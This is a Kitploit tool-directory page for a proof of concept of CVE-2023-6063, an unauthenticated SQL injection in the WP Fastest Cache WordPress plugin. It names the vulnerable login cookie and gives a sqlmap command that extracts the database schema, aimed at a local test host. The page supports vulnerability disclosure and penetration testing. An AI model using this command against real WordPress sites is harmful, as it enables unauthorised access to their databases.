Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-6063-PoC — CVE-2023-6063 (WP Fastest Cache < 1.2.2 - UnAuth SQL Injection) | Kitploit
Tools/GitHubGitHub/motikan2010/cve-2023-6063-poc
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubmotikan2010/cve-2023-6063-poc

CVE-2023-6063-PoC

CVE-2023-6063 (WP Fastest Cache < 1.2.2 - UnAuth SQL Injection)

View Repository
2932 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-6063 PoC

Reference

  • Unauthenticated SQL Injection Vulnerability Addressed in WP Fastest Cache 1.2.2 | WPScan

Plugin setting

Enable "WP Fastest Cache".

Image 1

PoC

The "wordpress_logged_in" cookie parameter is vulnerable.

root@kitploit:~
$ python sqlmap.py --dbms=mysql -u "http://127.0.0.1/wp-login.php" --cookie='wordpress_logged_in=*' --level=2 --schema

Image 2

Download Tool